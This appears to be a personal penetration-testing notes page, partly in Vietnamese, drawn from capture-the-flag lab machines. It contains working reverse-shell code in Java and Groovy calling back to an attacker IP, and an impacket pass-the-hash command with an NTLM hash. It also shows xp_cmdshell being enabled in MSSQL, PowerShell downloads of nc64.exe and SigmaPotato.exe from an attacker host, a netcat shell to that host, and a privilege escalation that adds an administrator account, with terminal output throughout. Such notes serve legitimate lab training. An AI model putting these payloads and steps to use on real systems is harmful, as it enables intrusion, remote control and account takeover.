Xử lý chuỗi Linux
tr ' ' '\n' < users.txt | cut -d'@' -f1
sed 's/ /\n/g; s/@.*//' users.txt
tr ' ' '\n' < users.txt | cut -d'@' -f1 > usernames.txt
Java code to create revershell
String host="10.10.14.21";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());whi
le(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Groovy
def host = "10.10.14.21"
def port = 4444
def pb = new ProcessBuilder("/bin/bash", "-i")
pb.redirectErrorStream(true)
def p = pb.start()
def s = new Socket(host, port)
def copy = { InputStream inS, OutputStream outS ->
byte[] buf = new byte[4096]
int len
while ((len = inS.read(buf)) != -1) {
outS.write(buf, 0, len)
outS.flush()
}
}
Thread.start { copy(p.inputStream, s.outputStream) }
Thread.start { copy(s.inputStream, p.outputStream) }
Find flag
find / "flag.txt" 2>/dev/null | grep "local.txt"
sudo find / -type f -iname 'psexec*.py' 2>/dev/null
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.226.212
impacket-psexec administrator@$IP
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Sau khi kết nối được vào myssql
Password: 09:57:11 [149/154]
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
lika@learning:~/Downloads$ smbclient \\\\$IP\\backups
Password for [WORKGROUP\lika]:
Try "help" to get a list of possible commands.
smb: \> exit
lika@learning:~/Downloads$ impacket-mssqlclient ARCHETYPE/sql_svc@$IP -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL (ARCHETYPE\sql_svc dbo@master)> SELECT is_srvrolemember('sysadmin');
-
1
SQL (ARCHETYPE\sql_svc dbo@master)> SELECT is_srvrolemember('sysadmin');
-
1
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC xp_cmdshell 'net user';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configu
ration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshe
ll' in SQL Server Books Online.
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc dbo@master)> sp_configure;
SQL (ARCHETYPE\sql_svc dbo@master)> exec sp_configure 'xp_cmdshell', 1;
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc dbo@master)>
Sau đó dùng lệnh xp_cmd shell tạo bind shell
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 443"
Có 2 cách để leo thang , 1 là search C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
PS C:\Users\sql_svc\Downloads> wget http://10.10.14.21/SigmaPotato.exe -outfile sigma.exe
wget http://10.10.14.21/SigmaPotato.exe -outfile sigma.exe
PS C:\Users\sql_svc\Downloads> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
2 là dùng SigmaPotato, do có SeImpersonatePrivilege
Thêm user
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\sql_svc\Downloads> .\sigma.exe "net user lika lab@123456 /add"
.\sigma.exe "net user lika lab@123456 /add"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 860 | Token: 0x820 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 988
[+] Current Command Length: 29 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 2140
[+] Process Output:
The command completed successfully.
PS C:\Users\sql_svc\Downloads> net user
net user
User accounts for \\ARCHETYPE
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
lika sql_svc WDAGUtilityAccount
The command completed successfully.
Thêm user vào admin
PS C:\Users\sql_svc\Downloads> .\sigma.exe "net localgroup Administrators lika /add"
.\sigma.exe "net localgroup Administrators lika /add"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 860 | Token: 0x820 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 996
[+] Current Command Length: 39 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 376
[+] Process Output:
The command completed successfully.
PS C:\Users\sql_svc\Downloads> net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
lika
The command completed successfully.
Sau đó login vào bằng lika với quyền admin
cat * | grep -i passw*
Find folder
find . -type d -name "myfolder"
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
find / -group bugtracker 2>/dev/null
aarch64-linux-gnu-gcc -o ndsudo_x86 ndsudo.c
or for 64-bit x86 Linux:
x86_64-linux-gnu-gcc -o ndsudo_x86 ndsudo.c
Exp
MD5: 32 hexadecimal characters (128 bits). SHA-1: 40 hexadecimal characters (160 bits). SHA-256: 64 hexadecimal characters (256 bits). SHA-512: 128 hexadecimal characters (512 bits).
https://www.tunnelsup.com/hash-analyzer/
| Hash Type | Mode |
|---|---|
| MD5 | 0 |
| SHA1 | 100 |
| bcrypt | 3200 |
| NTLM | 1000 |
| SHA-256 | 1400 |
| SHA-512 | 1700 |